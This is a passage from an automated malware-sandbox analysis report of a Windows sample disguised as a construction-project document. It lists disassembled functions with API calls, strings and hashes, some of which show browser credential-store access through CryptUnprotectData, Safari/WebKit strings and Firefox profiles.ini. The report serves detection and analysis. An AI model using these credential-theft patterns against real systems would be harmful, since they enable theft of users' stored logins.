                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3604893535-0
                                                                                                                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                          Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1213725291-0
                                                                                                                          • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                          • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                          Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                          • free.MSVCRT ref: 00418370
                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                          • API String ID: 2360000266-2664311388
                                                                                                                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                          Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1865533344-0
                                                                                                                          • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                          • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                          • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                          • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                          Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4255912815-0
                                                                                                                          • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                          • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                          • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                          • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                          Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                          • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                          • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                          • API String ID: 2929817778-1134094380
                                                                                                                          • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                          • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                          Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                          • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                          • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                          Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                                          • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                          • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                          Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                          Strings
                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                                          • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                          • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                          Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 829165378-0
                                                                                                                          • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                          • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                          Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                          • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                          • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                          • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
